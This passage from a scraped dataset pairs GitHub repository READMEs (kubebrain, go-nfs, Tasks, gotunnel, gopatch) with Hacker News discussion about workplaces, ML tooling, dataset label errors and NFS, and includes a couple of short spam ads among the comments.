"hn_comments": "Halfway through the post I concluded what you did at the end.I'm not sure if it's feasible given your current situation, but moving to another team will probably make you feel more engaged/fulfilled at work. You sound proactive and you care about doing a good job, a team where you're the only one with that attitude is only going to bring you down.You could switch teams or just go to another company.> I find myself cleaning up a lot of the messes these people make. I always was the first one attending to issues product owner found in their work and raise the concern in them because I don't want to see the team I am in fail because of anyone's inattention. I am not sure if I care too much but I know I certainly can't let my team fail even if I am not in the lead position.Why would they do their job, when it's easier to not do anything and let you do it for them?Perhaps you are taking it too seriously. Sometimes \"deadlines\" are not really deadlines. I once work on a team exactly like the one you described: I was the new one and I was coming from a company that was obsessed with delivery something every week (even if that means delivering crap features). My new team was slow (for my then standards), it would take two days for the senior engineers to open a pull request about\"adding a simple constant to an array\"... But I after a few months I got used to that pace because: 1) we were delivering almost no (serious) bugs (which means we were never being paged at 3am), 2) it was a very relaxed environment, where I wasn't stressed at all (not like in my previous company).What makes this specific to fintech vs. general ML tools? I led risk at a fintech and it\u2019s unclear how this is better than generalized solutions.Congratulations on launch! ML tools/services/platforms are really hard to build. You need to juggle not only frontend/backend frameworks but also make them work with ML frameworks. 
There are so many corner-cases that can make the whole app crash.How does it differ from open-source AutoML frameworks like https://github.com/mljar/mljar-supervised or drag-and-drop tools like Azure ML Studio?Is the no-writing the code a killer feature here?Do you have financial data enhancement feature? Do you plan such feature?Because financial data generally means time-series, autocorrelations abound, and it becomes very easy to develop a model that underperforms naive baselines (e.g. LOCF, arima) or peeks into the future through improper cross validation or feature engineering.If the customer gives you a column that peeks into the future (e.g. \"quarterly sales\" when each row is a sale in that quarter), you'll build a model that looks great on metrics and to the customer, and might take months for the customer to realize was practically useless. Are you able to reliably prevent these kinds of issues at a technical level, or do you lean towards customer education (\"don't give us quarterly sales\") instead?> We then used the error spotting tool on the Deepomatic platform to detect errors and to correct them.I'm wondering if those errors are selected on how much they impact the performance?Anyway, this is probably a much better way of gaining accuracy on the cheap than launching 100+ models for hyperparameter tuning.Best I can tell, they are using the ML model to detect the errors. Isn't this a bit of an ouroboros? The model will naturally get better, because you are only correcting problems where it was right but the label was wrong.It's not necessarily a representation of a better model, but just of a better testing set.20% annotation error is huge, especially since those datasets (COCO, VOC) are used for basically every benchmark and state of the art research.Why aren't these data sets editable instead of static? Treat them like a collaborative wiki or something (OpenStreetMap being the closest fit) and allow everyone to submit improvements so that all may benefit.I hope the people in this article had a way to contribute back their improvements, and did so.Gringo Marketing Article Spinner is constructed to offer the very best spinning tools with the greatest worth for all users and all languages. We know that premium article is crusial for every single people and company to meet their target marketing needs and requirements. We understand what is needed to supply advanced, yet user friendly software application to provide users the capability to make content quick create the short articles they need with no high costs or complicated settings. Visit https://gringomarketing.com/article-rewriterUsing simple techniques, they found out that popular open source datasets like VOC or COCO contain up to 20% annotation errors in. By manually correcting those errors, they got an average error reduction of 5% for state-of-the-art computer vision models.An idea on how this could work: repeatedly re-split the dataset (to cover all of it), and re-train a detector on the splits, then at the end of each training cycle surface validation frames with the highest computed loss (or some other metric more directly derived from bounding boxes, such as the number of high confidence \"false\" positives which could be instances of under-labeling) at the end of training. That's what I do on noisy, non-academic datasets, anyway.Weird behaviour on pinch to zoom (macbook). 
It scrolls instead of zooming and when swiping back nothing happens.Another example of why you should never mess with the defaults unless strictly necessary.Nothing is however said about how the errors are detected. Can an ML expert chime in?These things are why I stopped doing computer vision after my master thesisThe title here seems wrong. Suggested change:\"Cleaning algorithm finds 20% of errors in major image recognition datasets\" -> \"Cleaning algorithm finds errors in 20% of annotations in major image recognitions.\"We don't know if the found errors represent 20%, 90% or 2% of the total errors in the dataset.> Create an account on the Deepomatic platform with the voucher code \u201cSPOT ERRORS\u201d to visualize the detected errors.Nice ad.Talk to Dave at https://resumeraiders.com/ I had him help with my resume and linkedin profile and recommend his work.As smt88 says in the comments:\n> You can't. If you value the relationship, don't do this.While I agree that there is never a water-tight way to protect personal relationships, it is possible to retain them in a business scenario. But I would advise against it.I have for many years now had a company with my best friend. We lived together for a long time, and let me tell you \u2014 you start to lose the quirks and the 'niceties' of an established personal relationship very very fast unless you are able to separate work and life, and create boundaries to do so. It seems like you and your wife currently have a separate home life from your other business partners, so this is a good step.One of the reasons why my and my friend's company works so well is that we have a strict 50/50 split on equity and pay. This means sometimes one contributes more than the other. Yes, this can create feelings of resentment \u2014 and unless you are 100% open about your feelings with each other, and are close enough to remedy it, these feelings can harbor and grow and ultimately ruin the relationship. Business (especially when starting one) is unpredictable. That is an understatement. I would argue that splitting equity differently than equally has more potential to go wrong because roles are often redefined on the fly and you cannot foresee with certainty how much work each person will have on their plate.I feel like my 'success' at doing at what you are hoping to achieve is an outlier. Indeed, we have also both worked with other family members and this has somewhat soured relations. Very rarely does business make a pre-existing personal relationship stronger. It adds more potential points of contention. Things never go swimmingly; and the best you can hope for is a solid outcome with bumps along the way. You must ask yourself if you are capable of handling these bumps as a group.You must also ask yourself if you are willing to lose your relationship (as it is). This is a very real risk, and has happened to people I know (myself included).I wish you the best, but also cannot strain enough how important it is to value personal relationships.Set all your expectations up front and explicitly as possible. That can be more awkward with family than colleagues but it's also more important. Resentment occurs when someone thinks they're doing more or getting less than they bargained for.You can't. 
If you value the relationship, don't do this.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubewharf/kubebrain", "link": "https://github.com/kubewharf/kubebrain", "tags": ["kubernetes", "etcd", "metadata", "scalability", "kv-store"], "stars": 543, "description": "A High Performance Metadata System for Kubernetes", "lang": "Go", "repo_lang": "", "readme": "#KubeBrain\n\n[English](README.md) | Chinese\n\nThe distributed application orchestration and scheduling system kubernetes has become the de facto standard for cloud-native application bases, but its official stable operation scale is limited to only 5K nodes; this is sufficient for most application scenarios, but for millions of machine nodes The application scenarios are still not enough in scale. Especially with the development of \"digitalization\" and \"cloud nativeization\", the overall scale of global IT infrastructure will continue to grow at an accelerated rate. For distributed application scheduling systems, there are two ways to adapt to this trend:\n\n- **horizontal expansion** to build the ability to manage N clusters\n- **Vertical expansion** to increase the size of a single cluster\n\nTo expand the scale of a single cluster, the storage of meta information/state information is one of the core extension points. This project is to solve the scalability and performance problems of cluster state information storage.\n\nWe investigated some existing distributed storage systems, and also analyzed the performance bottleneck of ETCD and the interface requirements of kubernetes for state information storage. Inspired by the [kine project](https://github.com/k3s-io/kine), KubeBrain was implemented as the core service of Kubernetes state information storage.\n\n# Project Features\n\n- **no status**\n As a component that implements the storage server interface required by the API Server, KubeBrain converts the storage interface and does not actually store data. The actual metadata is stored in the underlying storage engine, and the data that the API Server needs to monitor is stored in the master node. in memory.\n- **Scalability**\n KubeBrain abstracts the key-value database interface, and on this basis implements the interface required for storage API Server storage. Key-value databases with specified characteristics can be adapted to the storage interface.\n- **High Availability**\n KubeBrain currently adopts a master-slave architecture. The master node supports all operations including conditional update, read, and event monitoring, and the slave node supports read operations. 
Based on K8S [leaderelection](https://github.com/kubernetes/client-go/ tree/master/tools/leaderelection)\n Automatic master selection to achieve high availability.\n- **Horizontal Expansion**\n In a production environment, KubeBrain usually uses a distributed key-value database to store data, and horizontal expansion includes two levels:\n - At the KubeBrain level, the concurrent read performance can be improved by adding slave nodes;\n - At the storage engine level, read and write performance and storage capacity can be improved by adding storage nodes and other means.\n\n# Detailed documentation\n\n- [Quick Start](./docs/quick_start_en.md)\n- [Architecture Design](./docs/design_in_detail_cn.md)\n- [Storage Engine](./docs/storage_engine_en.md)\n- [Performance Test](./docs/benchmark_cn.md)\n\n# TODO\n\n- [ ] Optimize storage engine interface\n- [ ] Consistency guarantees in extreme cases\n- [ ] Built-in logic clock\n- [ ] Optimize unit test code, increase use cases and error injection\n- [ ] [Jepsen Test](https://jepsen.io/)\n- [ ] Realize the Proxy function\n\n# Contributing code\n\n[Contributing](CONTRIBUTING.md)\n\n# contact us\n\n- Email: kubewharf.conduct@bytedance.com\n- Member: Please see [Maintainers](./MAINTAINER.md)\n\n# open source license\n\nKubeBrain is based on the [Apache License 2.0] (LICENSE) license.", "readme_type": "markdown", "hn_comments": "What kind of backend storage does KubeBrain use?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "willscott/go-nfs", "link": "https://github.com/willscott/go-nfs", "tags": ["nfsv3", "golang", "nfs", "nfs-server", "billy", "hacktoberfest"], "stars": 542, "description": "golang NFSv3 server", "lang": "Go", "repo_lang": "", "readme": "Golang Network File Server\n===\n\nNFSv3 protocol implementation in pure Golang.\n\nCurrent Status:\n* Minimally tested\n* Mounts, read-only and read-write support\n\nUsage\n===\n\nThe most interesting demo is currently in `example/osview`. \n\nStart the server\n`go run ./example/osview .`.\n\nThe local folder at `.` will be the initial view in the mount. mutations to metadata or contents\nwill be stored purely in memory and not written back to the OS. 
When run, this\ndemo will print the port it is listening on.\n\nThe mount can be accessed using a command similar to \n`mount -o port=,mountport= -t nfs localhost:/mount ` (For Mac users)\n\nor\n\n`mount -o port=,mountport=,nfsvers=3,noacl,tcp -t nfs localhost:/mount ` (For Linux users)\n\nAPI\n===\n\nThe NFS server runs on a `net.Listener` to export a file system to NFS clients.\nUsage is structured similarly to many other golang network servers.\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\n\t\"github.com/go-git/go-billy/v5/memfs\"\n\tnfs \"github.com/willscott/go-nfs\"\n\tnfshelper \"github.com/willscott/go-nfs/helpers\"\n)\n\nfunc main() {\n\tlistener, err := net.Listen(\"tcp\", \":0\")\n\tpanicOnErr(err, \"starting TCP listener\")\n\tfmt.Printf(\"Server running at %s\\n\", listener.Addr())\n\tmem := memfs.New()\n\tf, err := mem.Create(\"hello.txt\")\n\tpanicOnErr(err, \"creating file\")\n\t_, err = f.Write([]byte(\"hello world\"))\n\tpanicOnErr(err, \"writing data\")\n\tf.Close()\n\thandler := nfshelper.NewNullAuthHandler(mem)\n\tcacheHelper := nfshelper.NewCachingHandler(handler, 1)\n\tpanicOnErr(nfs.Serve(listener, cacheHelper), \"serving nfs\")\n}\n\nfunc panicOnErr(err error, desc ...interface{}) {\n\tif err == nil {\n\t\treturn\n\t}\n\tlog.Println(desc...)\n\tlog.Panicln(err)\n}\n```\n\nNotes\n---\n\n* Ports are typically determined through portmap. The need for running portmap \n(which is the only part that needs a privileged listening port) can be avoided\nthrough specific mount options. e.g. \n`mount -o port=n,mountport=n -t nfs host:/mount /localmount`\n\n* This server currently uses [billy](https://github.com/go-git/go-billy/) to\nprovide a file system abstraction layer. There are some edges of the NFS protocol\nwhich do not translate to this abstraction.\n * NFS expects access to an `inode` or equivalent unique identifier to reference\n files in a file system. These are considered opaque identifiers here, which\n means they will not work as expected in cases of hard linking.\n * The billy abstraction layer does not extend to exposing `uid` and `gid`\n ownership of files. If ownership is important to your file system, you\n will need to ensure that the `os.FileInfo` meets additional constraints.\n In particular, the `Sys()` escape hatch is queried by this library, and\n if your file system populates a [`syscall.Stat_t`](https://golang.org/pkg/syscall/#Stat_t)\n concrete struct, the ownership specified in that object will be used.\n\n* Relevant RFCS:\n[5531 - RPC protocol](https://tools.ietf.org/html/rfc5531),\n[1813 - NFSv3](https://tools.ietf.org/html/rfc1813),\n[1094 - NFS](https://tools.ietf.org/html/rfc1094)\n", "readme_type": "markdown", "hn_comments": "Good work !\nPS is NFS still a thing ? I thought Gluster(FS) or S3 sorta replaced it in most shops ? 
I could be mistaken of course.@willscott: Do you have any experience to share running this over Wireguard or similar?Edit: Thank you!Considering how many things have been implemented on top of HTTP, I find it interesting that something like WebDAV (or Solid[0], or remoteStorage[1]) hasn't nearly completely supplanted NFS/SFTP/etc.Not saying that would be ideal from a technical perspective (WebDAV at least has some issues), just surprised the ability to access remote filesystems from the browser hasn't been a bigger driver.For example, there are a lot of interesting apps built on top of Google Drive as the storage backend, but overall the concept doesn't seem to have gained much traction.[0]: https://inrupt.com/solid[1]: https://remotestorage.io/I've always wondered if I could take the Unix \"everything is a file\" approach way too far and hook it up to a web service. This looks like exactly the kind of glue to make that easy...This is cool! At a previous company we got a lot of mileage in debugging and ad-hoc tasks by exposing various things as filesystems. We mostly did webdav, but NFS is way better from a client transparency perspective. For many folks find, ls, and grep very much beat curl and jq.Didn't see it mentioned in the README, so I'll ask here: any particular reason to go NFSv3 vs NFSv4? I'm not familiar enough with the protocol to venture an educated guess.I wonder if this is a good way to support projects like Microsoft's Git VFS without requiring specific kernel drivers. Mounting a special Git NFS drive + having all the magic hidden behind NFS seems like it could be interesting.Possibly useful existing implementation:https://github.com/unfs3/unfs3This has the benefits of being tested and having a working read-write implementation (along with still being user-space).When looking for something like this a year or so ago, I found [1] which supports both NFSv3 and v4 as well as p9. It worked alright in my experience though I eventually switched to ZFS which has built in support to auto-configure NFS shares.[1]: https://github.com/nfs-ganesha/nfs-ganeshaWasn't expecting to see this here!This turned out easier than i was expecting it to be. It's nice to be able to mount a VFS without needing privileges on the server side.\nThe main intention for this code is to eventually use it to replace fuse on mac, since nfs is a valid mount time for mac clients to consume.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thewhitetulip/Tasks", "link": "https://github.com/thewhitetulip/Tasks", "tags": ["webapp", "golang", "todo", "task-tracker"], "stars": 542, "description": "A simplistic todo list manager written in Go", "lang": "Go", "repo_lang": "", "readme": "# Tasks\n\nTasks is a simplistic Go webapp to manage tasks, I built this tool to manage tasks which I wanted to do, there are many good kanban style boards, but I felt they were a bit too heavyweight for my taste. Also I wanted to learn the Go webapp development.\n\nHow to use?\n==================\nVia script: `bash install.sh`\n\nThis will generate the binary and set up the database. If you want, you can copy the binary and the public folder into a folder of your choice.\n\nManually:\n\n1. `go get github.com/thewhitetulip/Tasks`\n1. change dir to the respective folder and create the db file: `cat schema.sql | sqlite3 tasks.db`\n1. run `go build`\n1. `./Tasks`\n1. 
open [localhost:8081](http://localhost:8081)\n\nYou can change the port in the [config](https://github.com/thewhitetulip/Tasks/blob/master/config.json) file\n\n## Features\n\n1. Add, update, delete task.\n2. Search tasks, the query is highlighted in the search results page.\n3. Github flavoured markdown, which enables us for using a task list, advanced syntax highlighting and much more.\n4. Supports file upload, randomizes the file name, stores the user given filename in a db and works on the randomized file name for security reasons.\n5. Priorities are assigned, High = 3, medium = 2 and low = 1, sorting is done on priority descending and created date ascending.\n6. Categories are supported, you can add tasks to different categories. \n1. Ability to hide a task from the timeline.\n1. For a task list, shows 6 out of 8 tasks completed.\n1. Single click install, just run the install.sh file.\n\n\n##### Book\nI am learning writing webapps with Go as I build this application, I took to writing an introductory book about [building webapps in Go](https://github.com/thewhitetulip/web-dev-golang-anti-textbook) because I faced a lot of problems while learning how to write webapps in Go, it, the book strives to teach by practical examples. You are welcome to contribute to the book.\n\n# Screenshots\nThe Home Page\n\n![Home Page](https://github.com/thewhitetulip/Tasks/blob/master/screenshots/FrontEnd.png)\n\nAdd Task dialog\n\n![Add Task](https://github.com/thewhitetulip/Tasks/blob/master/screenshots/FrontEnd-Add%20task.png)\n\nNavigation drawer\n\n![Navigation Drawer](https://github.com/thewhitetulip/Tasks/blob/master/screenshots/FrontEnd%20Navigation%20Drawer.png)\n\n# License\n\nThe MIT License (MIT)\n\nCopyright (c) 2015 Suraj Patil\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n", "readme_type": "markdown", "hn_comments": "I wish we would write Go apps following that lovely pattern, but without opening a DOS box, ie like a Windows app.I'd love feedback about the appThis looks good - nice and simple and self hosted, could you add support for multiple lists? That'd be awesome.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xjdrew/gotunnel", "link": "https://github.com/xjdrew/gotunnel", "tags": [], "stars": 542, "description": "tcp tunnel", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/xjdrew/gotunnel.svg?branch=master)](https://travis-ci.org/xjdrew/gotunnel)\n\n## gotunnel\ngotunnel is a secure tcp tunnel software. 
It can use tcp or udp connections as the low-level tunnel.\n\ngotunnel can be added to any client/server system that uses the tcp protocol, making the system structure evolve from\n```\nclient <--------------> server\n```\nto\n```\nclient <-> gotunnel <--------------> gotunnel <-> server\n```\nto gain gotunnel's valuable features, such as security and persistence. \n\n## build\n\n```bash\ngo install github.com/xjdrew/gotunnel\n```\n\n\n## Usage\n\n```\nusage: bin/gotunnel\n -backend string\n backend address (default \"127.0.0.1:1234\")\n -listen string\n listen address (default \":8001\")\n -log uint\n log level (default 1)\n -secret string\n tunnel secret (default \"the answer to life, the universe and everything\")\n -timeout int\n tunnel read/write timeout (default 3)\n -tunnels uint\n low level tunnel count, 0 if work as server\n```\n\nSome options:\n* secret: used for authentication and for exchanging the encryption key\n* tunnels: 0 means gotunnel will act as a server; any value larger than 0 means gotunnel will work as a client and build *tunnels* tcp connections to the server.\n* timeout: if a packet body can't be read within *timeout* seconds, the tunnel is recreated. This is useful if there is a strict firewall between the gotunnel client and server.\n\n\n## Example\nSuppose you have a squid server and you use it as an http proxy. Usually, you will start the server:\n```\n$ squid3 -a 8080\n```\nand use it on your pc:\n```\ncurl --proxy server:8080 http://example.com\n```\nIt works fine, but all traffic between your server and pc is plaintext, so someone can monitor you easily. In this case, gotunnel can help encrypt your traffic.\n\nFirst, on your server, restart squid to listen on a local port, for example **127.0.0.1:3128**. Then start the gotunnel server listening on port 8001 with **127.0.0.1:3128** as the backend.\n```\n$ ./gotunnel -listen=:8001 -backend=127.0.0.1:3128 -secret=\"your secret\" -log=10 \n```\nSecond, on your pc, start the gotunnel client:\n```\n$ ./gotunnel -tunnels=100 -listen=\"127.0.0.1:8080\" -backend=\"server:8001\" -secret=\"your secret\" -log=10 \n```\n\nThen you can use squid3 on your local port as before, but all your traffic is encrypted. \n\nBesides that, you don't need to create and destroy tcp connections between your pc and server, because gotunnel uses long-lived tcp connections as the low-level tunnel. In most cases, it will be faster.\n\n## licence\nThe MIT License (MIT)\n\nCopyright (c) 2015 xjdrew\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "uber-go/gopatch", "link": "https://github.com/uber-go/gopatch", "tags": ["golang", "refactoring", "go"], "stars": 542, "description": "Refactoring and code transformation tool for Go.", "lang": "Go", "repo_lang": "", "readme": "# gopatch [![Go](https://github.com/uber-go/gopatch/actions/workflows/go.yml/badge.svg)](https://github.com/uber-go/gopatch/actions/workflows/go.yml) [![codecov](https://codecov.io/gh/uber-go/gopatch/branch/main/graph/badge.svg?token=tFsx23GSTB)](https://codecov.io/gh/uber-go/gopatch)\n\ngopatch is a tool to match and transform Go code. 
It is meant to aid in\nrefactoring and restyling.\n\n# Table of contents\n\n- [Introduction](#introduction)\n- [Getting started](#getting-started)\n - [Installation](#installation)\n - [Your first patch](#your-first-patch)\n - [Apply the patch](#apply-the-patch)\n - [Next steps](#next-steps)\n- [Usage](#usage)\n - [Options](#options)\n- [Patches](#patches)\n - [Metavariables](#metavariables)\n - [Statements](#statements)\n - [Elision](#elision)\n - [Comments](#comments)\n - [Description comments](#description-comments)\n - [Usage in diff mode](#usage-during-diff-mode)\n- [Examples](#examples)\n- [Project status](#project-status)\n - [Goals](#goals)\n - [Known issues](#known-issues)\n - [Upcoming](#upcoming)\n- [Similar Projects](#similar-projects)\n- [Credits](#credits)\n\n# Introduction\n\ngopatch operates like the Unix `patch` tool: given a patch file and another\nfile as input, it applies the changes specified in the patch to the provided\nfile.\n\n```\n .-------. .-------.\n/_| |. /_| |.\n| ||. +---------+ | ||.\n| .go |||>-->| gopatch |>-->| .go |||\n| ||| +---------+ | |||\n'--------'|| ^ '--------'||\n '--------'| | '--------'|\n '--------' | '--------'\n .-------. |\n /_| | |\n | +----'\n | .patch |\n | |\n '--------'\n```\n\nWhat specifically differentiates it from `patch` is that unlike plain text\ntransformations, it can be smarter because it understands Go syntax.\n\n# Getting started\n\n## Installation\n\nDownload a **pre-built binary** of gopatch from the [Releases page] or by\nrunning the following command in your terminal and place it on your `$PATH`.\n\n [Releases page]: https://github.com/uber-go/gopatch/releases\n\n```bash\nVERSION=0.1.1\nURL=\"https://github.com/uber-go/gopatch/releases/download/v$VERSION/gopatch_${VERSION}_$(uname -s)_$(uname -m).tar.gz\"\ncurl -L \"$URL\" | tar xzv gopatch\n```\n\nAlternatively, if you have Go installed, **build it from source** and install\nit with the following command.\n\n```bash\ngo install github.com/uber-go/gopatch@latest\n```\nNote: If you're using Go < 1.16, use `go get github.com/uber-go/gopatch@latest` instead.\n\n## Your first patch\n\nWrite your first patch.\n\n```shell\n$ cat > ~/s1028.patch\n@@\n@@\n-import \"errors\"\n\n-errors.New(fmt.Sprintf(...))\n+fmt.Errorf(...)\n```\n\nThis patch is a fix for staticcheck [S1028]. 
It searches for uses of\n[`fmt.Sprintf`] with [`errors.New`], and simplifies them by replacing them\nwith [`fmt.Errorf`].\n\n [S1028]: https://staticcheck.io/docs/checks#S1028\n [`fmt.Sprintf`]: https://golang.org/pkg/fmt/#Sprintf\n [`errors.New`]: https://golang.org/pkg/errors/#New\n [`fmt.Errorf`]: https://golang.org/pkg/fmt/#Errorf\n\nFor example,\n\n```go\nreturn errors.New(fmt.Sprintf(\"invalid port: %v\", err))\n// becomes\nreturn fmt.Errorf(\"invalid port: %v\", err)\n```\n\n## Apply the patch\n\n- `cd` to your Go project's directory.\n\n ```shell\n $ cd ~/go/src/example.com/myproject\n ```\n\n Run `gopatch` on the project, supplying the previously written patch with the\n `-p` flag.\n\n ```shell\n $ gopatch -p ~/s1028.patch ./...\n ```\n\n This will apply the patch on all Go code in your project.\n\n Check if there were any instances of this issue in your code by running\n `git diff`.\n- Instead, `cd` to your Go project's directory.\n\n ```shell\n $ cd ~/go/src/example.com/myproject\n ```\n\n Run `gopatch` on the project, supplying the previously written patch with the\n `-p` flag along with '-d' flag.\n\n ```shell\n $ gopatch -d -p ~/s1028.patch ./...\n ```\n\n This will turn on diff mode and will write the diff to stdout instead of modifying all\n the Go code in your project. To provide more context on what the patch does, if\n there were description comments in the patch, they will also get displayed at \n the top. To learn more about description comments jump to section [here](#description-comments)\n \n For example if we applied patch ~/s1028 to our testfile error.go\n ```shell\n $ gopatch -d -p ~/s1028.patch ./testdata/test_files/diff_example/\n ```\n Output would be : \n ```\n gopatch/testdata/test_files/diff_example/error.go:Replace redundant fmt.Sprintf with fmt.Errorf\n --- gopatch/testdata/test_files/diff_example/error.go\n +++ gopatch/testdata/test_files/diff_example/error.go\n @@ -7,7 +7,7 @@\n \n func foo() error {\n err := errors.New(\"test\")\n - return errors.New(fmt.Sprintf(\"error: %v\", err))\n + return fmt.Errorf(\"error: %v\", err)\n }\n \n func main() {\n\n ```\n Note: Only the description comments of patches that actually **apply** are displayed.\n\n## Next steps\n\nTo learn how to write your own patches, move on to the [Patches] section. To\ndive deeper into patches, check out [Patches in depth].\n\n [Patches in depth]: docs/PatchesInDepth.md\n\nTo experiment with other sample patches, check out the [Examples] section.\n\n [Patches]: #patches\n [Examples]: #examples\n\n# Usage\n\nTo use the gopatch command line tool, provide the following arguments.\n\n```\ngopatch [options] pattern ...\n```\n\nWhere pattern specifies one or more Go files, or directories containing Go\nfiles. For directories, all Go code inside them and their descendants will be\nconsidered by gopatch.\n\n## Options\n\ngopatch supports the following command line options.\n\n- `-p file`, `--patch=file`\n\n Path to a patch file specifying a transformation. Read more about the\n patch file format in [Patches].\n\n Provide this flag multiple times to apply multiple patches in-order.\n\n ```shell\n $ gopatch -p foo.patch -p bar.patch path/to/my/project\n ```\n\n If this flag is omitted, a patch is expected on stdin.\n\n ```shell\n $ gopatch path/to/my/project << EOF\n @@\n @@\n -foo\n +bar\n EOF\n ```\n- `-d`, `--diff`\n\n Flag to turn on diff mode. 
Provide this flag to write the diff to stdout instead\n of modifying the file and display applied patches' [description comments](#description-comments) if they exist. \n Use in conjunction with -p to provide patch file.\n \n Only need to apply the flag once to turn on diff mode\n\n ```shell\n $ gopatch -d -p foo.patch -p bar.patch path/to/my/project\n ```\n\n If this flag is omitted, normal patching occurs which modifies the\n file instead.\n- `--print-only`\n \n Flag to turn on print-only mode. Provide this flag to write the changed code to stdout instead of modifying the\n file and display applied patches' description comments to stderr if they exist.\n \n ```shell\n $ gopatch --print-only -p foo.patch -p bar.patch path/to/my/project\n ```\n \n\n# Patches\n\nPatch files are the input to gopatch that specify how to transform code. Each\npatch file contains one or more patches. This section provides an introduction\nto writing patches; look at [Patches in depth] for a more detailed\nexplanation.\n\nEach patch specifies a code transformation. These are formatted like unified\ndiffs: lines prefixed with `-` specify matching code should be deleted, and\nlines prefixed with `+` specify that new code should be added.\n\nConsider the following patch.\n\n```diff\n@@\n@@\n-foo\n+bar\n```\n\nIt specifies that we want to search for references to the identifier `foo` and\nreplace them with references to `bar`. (Ignore the lines with `@@` for now.\nWe will cover those below.)\n\nA more selective version of this patch will search for uses of `foo` where it\nis called as a function with specific arguments.\n\n```diff\n@@\n@@\n-foo(42)\n+bar(42)\n```\n\nThis will search for invocations of `foo` as a function with the specified\nargument, and replace only those with `bar`.\n\ngopatch understands Go syntax, so the above is equivalent to the following.\n\n```diff\n@@\n@@\n-foo(\n+bar(\n 42,\n )\n```\n\n## Metavariables\n\nSearching for hard-coded exact parameters is limited. We should be able to\ngeneralize our patches.\n\nThe previously ignored `@@` section of patches is referred to as the\n**metavariable section**. That is where we specify **metavariables** for the\npatch.\n\nMetavariables will match any code, to be reproduced later. Think of them like\nholes to be filled by the code we match. For example,\n\n```diff\n@@\nvar x expression\n@@\n# rest of the patch\n```\n\nThis specifies that `x` should match any Go expression and record its match\nfor later reuse.\n\n> **What is a Go expression?**\n>\n> Expressions usually refer to code that has value. You can pass these as\n> arguments to functions. 
These include `x`, `foo()`, `user.Name`, etc.\n>\n> Check the [Identifiers vs expressions vs statements] section of the appendix\n> for more.\n\n [Identifiers vs expressions vs statements]: docs/Appendix.md#identifiers-vs-expressions-vs-statements\n\nSo the following patch will search for invocations of `foo` with a single\nargument---any argument---and replace them with invocations of `bar` with the\nsame argument.\n\n```diff\n@@\nvar x expression\n@@\n-foo(x)\n+bar(x)\n```\n\n| Input | Output |\n|--------------------|--------------------|\n| `foo(42)` | `bar(42)` |\n| `foo(answer)` | `bar(answer)` |\n| `foo(getAnswer())` | `bar(getAnswer())` |\n\n\nMetavariables hold the entire matched value, so we can add code around them\nwithout risk of breaking anything.\n\n```diff\n@@\nvar x expression\n@@\n-foo(x)\n+bar(x + 3, true)\n```\n\n| Input | Output |\n|--------------------|------------------------------|\n| `foo(42)` | `bar(42 + 3, true)` |\n| `foo(answer)` | `bar(answer + 3, true)` |\n| `foo(getAnswer())` | `bar(getAnswer() + 3, true)` |\n\nFor more on metavariables see [Patches in depth/Metavariables].\n\n [Patches in depth/Metavariables]: docs/PatchesInDepth.md#metavariables\n\n## Statements\n\ngopatch patches are not limited to transforming basic expressions. You can\nalso transform statements.\n\n> **What is a Go statements?**\n>\n> Statements are instructions to do things, and do not have value. They cannot\n> be passed as parameters to other functions. These include assignments\n> (`foo := bar()`), if statements (`if foo { bar() }`), variable declarations\n> (`var foo Bar`), and so on.\n>\n> Check the [Identifiers vs expressions vs statements] section of the appendix\n> for more.\n\nFor example, consider the following patch.\n\n```diff\n@@\nvar f expression\nvar err identifier\n@@\n-err = f\n-if err != nil {\n+if err := f; err != nil {\n return err\n }\n```\n\nThe patch declares two metavariables:\n\n- `f`: This represents an operation that possibly returns an `error`\n- `err`: This represents the name of the `error` variable\n\nThe patch will search for code that assigns to an error variable immediately\nbefore returning it, and inlines the assignment into the `if` statement. This\neffectively [reduces the scope of the variable] to just the `if` statement.\n\n [reduces the scope of the variable]: https://github.com/uber-go/guide/blob/master/style.md#reduce-scope-of-variables\n\n\n\n\n\n\n
**Input:**\n\n```go\nerr = foo(bar, baz)\nif err != nil {\n\treturn err\n}\n```\n\n**Output:**\n\n```go\nif err := foo(bar, baz); err != nil {\n\treturn err\n}\n```\n\n**Input:**\n\n```go\nerr = comment.Submit(ctx)\nif err != nil {\n\treturn err\n}\n```\n\n**Output:**\n\n```go\nif err := comment.Submit(ctx); err != nil {\n\treturn err\n}\n```\n
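Because `f` is declared as an `expression` metavariable, the same patch also matches more involved right-hand sides. The following before/after snippet is an illustrative sketch rather than an example taken from the gopatch documentation; the `c.client.Do(ctx, req, &resp)` call is a made-up stand-in for such an expression:\n\n```go\n// Before: the entire call expression binds to the metavariable f.\nerr = c.client.Do(ctx, req, &resp)\nif err != nil {\n\treturn err\n}\n\n// After: the assignment is inlined into the if statement.\nif err := c.client.Do(ctx, req, &resp); err != nil {\n\treturn err\n}\n```\n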
